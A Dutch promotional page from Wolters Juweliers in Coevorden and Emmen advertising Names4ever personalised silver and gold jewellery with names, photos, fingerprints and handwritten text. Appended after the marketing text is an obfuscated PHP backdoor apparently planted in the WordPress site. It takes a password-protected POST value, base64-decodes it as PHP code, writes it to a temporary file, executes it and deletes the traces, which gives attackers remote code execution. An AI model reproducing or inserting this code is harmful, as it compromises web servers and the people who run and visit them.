Names4ever naamsiervaden-Wolters Juweliers Coevorden Emmen

Gepersonaliseerde sieraden van Names4ever bij Wolters Juweliers Coevorden Emmen

Names4ever is dé specialist op het gebied van gepersonaliseerde sieraden. Names4ever staat bekend om hun ruime aanbod van stijlvolle naamkettingen tot aan dierbare sieraden met foto of vingerafdruk. Alle sieraden worden gemaakt van echt 925 sterling zilver of 14 karaats goud. Om een zo goed mogelijk product af te leveren, worden alle bestellingen handmatig ontworpen voor een zo goed mogelijk resultaat.

De sieraden worden na dit proces ook nog eens door vakmensen bewerkt en afgewerkt, zodat alles in perfecte staat zonder verzendkosten verstuurd kan worden in een vrolijk versierd doosje. Kom langs bij Wolters Juweliers Coevorden Emmen, wij geven u graag advies over deze Names4ever sieraden.

Gepersonaliseerde sierdaen Names4ever bij -Woltersjuweliers Coevorden Emmen
Persoonlijk sieraad kado geven Wolters Juweliers Coevorden Emmen

Leuk om te geven

Names4ever begrijpt als geen ander dat het lastig is om leuke cadeaus te verzinnen voor verschillende gelegenheden. Gelukkig hebben zij hier de oplossing voor gevonden! Omdat alle sieraden gepersonaliseerd kunnen worden, is dit een origineel cadeau dat niemand verwacht.

Persoonlijk sieraad kado bij een geboorte

Voor een geboorte zou dit één van hun moeder en kind sieraden kunnen zijn, waarin een naam, datum of zelf een geboortesteen geplaatst kan worden. Voor verjaardagen hebben zij een ruim aanbod van graveerplaatjes, bijvoorbeeld in de vorm van een hart of infinity teken. Op zoek naar iets met een nog waardevollere betekenis? Dan kunt u kiezen uit sieraden in verschillende vormen met een foto, vingerafdruk of een handgeschreven tekst.

Foto sieraden

Bij Names4ever is het ook mogelijk om sieraden te bestellen met een foto naar keuze. Deze foto sieraden bieden u de kans om iemand of een herinnering zo dicht mogelijk bij u te dragen. Dit kan gaan om een geliefde, een (klein)kind, overleden dierbare of zelfs uw geliefde huisdier. Vrijwel elke foto kan omgetoverd worden in een prachtsieraad.

Names4ever is gespecialiseerd in het graveren van sieraden. Met veel aandacht en de beste technieken worden de foto’s, na bewerking van de designers, gegraveerd op het sieraad. Het niveau van detail en kwaliteit is dan ook vele malen hoger dan dat van hun concurrenten. Omdat de foto’s in het zilver of goud worden gegraveerd, kan de foto niet van de hanger af slijten. De foto sieraden kunnen besteld worden in verschillende vormen zoals hartvormig, vierkant, rechthoekig, ovaal en zelfs met een sierlijke rand of geboortesteen! Naast het ruime aanbod in vormen, is het ook nog mogelijk om de foto sieraden als hanger voor een ketting óf armband te bestellen.

Foto sieraden zilver goud Wolters Juweliers Coevorden Emmen
Vingerafdruk sieraden names4ever bij Wolters Juweliers Coevorden Emmen

Vingerafdruk sieraden

Voor wie een persoon altijd dichtbij zich wilt dragen, is bij Names4ever aan het juiste adres. Het is bij hen namelijk mogelijk om een vingerafdruk op een sieraad te laten graveren. Net als bij de foto sieraden is er een ruim aanbod aan vormen. Bij sommige modellen is het zelfs mogelijk een naam of datum erbij te graveren. In het atelier wordt de vingerafdruk bewerkt en omgezet naar een gravure. De sieraden zijn door het materiaal en vakkennis van hoge kwaliteit. De sieraden zijn tijdloos en elegant, maar het belangrijkste is dat ze een waardevolle betekenis voor de drager kunnen hebben.

De technieken die gebruikt worden bij de vingerafdruk en de fotosieraden worden ook toegepast bij de collectie eigen tekst sieraden. Deze collectie biedt de kans om een handgeschreven tekst op een hanger te laten graveren. Het is uniek en persoonlijk om een leuke tekst, quote of boodschap te laten graveren en cadeau te geven. Kijk voor het ruime aanbod sieraden van Names4ever op www.names4ever.nl en kom langs bij Wolters Juweliers Coevorden Emmen, wij geven u graag meer uitleg over deze sieraden.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}